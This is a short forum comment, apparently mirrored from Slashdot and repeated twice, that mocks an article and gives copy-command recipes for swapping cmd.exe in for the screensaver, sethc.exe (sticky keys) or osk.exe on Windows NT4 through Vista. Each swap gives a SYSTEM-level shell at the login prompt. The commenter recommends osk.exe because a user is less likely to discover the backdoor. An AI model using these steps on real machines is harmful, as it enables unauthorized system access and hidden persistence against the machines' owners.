this is an uberlame post...
here's why...
this vulnerability is widely known since WINDOWS NT 4.0 (and yes it IS vulnerable along with win2k and xp and 2003)
tha fact that he claims that only vista is vulnerable disclose that he doesn't even understand the trick...
recipe foe windows nt4:
copy c:\winnt\system32\default.scr c:\winnt\system32\default.scr_ && copy c:\winnt\system32\cmd.exe c:\winnt\system32\default.scr
after the trick logoff and wait 15 mins: the cmd will popup instead of the screensaver (nt authority\system by the way) .
recipe for win2k/XP/2003
copy cmd.exe to c:\windows\system32\sethc.exe
then at the login prompt push 5 times the right-shift, a cme will popup with a sexy sound...
(system access)
with vista/server 2008...
I'd suggest to copy cmd.exe to osk.exe (on-screen keyboard) it is less likely a user will discover the backdoor.
very very old tricks....
nicola del vacchio
mcse/cissp
Slashdot Mirror
this is an uberlame post... here's why... this vulnerability is widely known since WINDOWS NT 4.0 (and yes it IS vulnerable along with win2k and xp and 2003) tha fact that he claims that only vista is vulnerable disclose that he doesn't even understand the trick... recipe foe windows nt4: copy c:\winnt\system32\default.scr c:\winnt\system32\default.scr_ && copy c:\winnt\system32\cmd.exe c:\winnt\system32\default.scr after the trick logoff and wait 15 mins: the cmd will popup instead of the screensaver (nt authority\system by the way) . recipe for win2k/XP/2003 copy cmd.exe to c:\windows\system32\sethc.exe then at the login prompt push 5 times the right-shift, a cme will popup with a sexy sound... (system access) with vista/server 2008... I'd suggest to copy cmd.exe to osk.exe (on-screen keyboard) it is less likely a user will discover the backdoor. very very old tricks.... nicola del vacchio mcse/cissp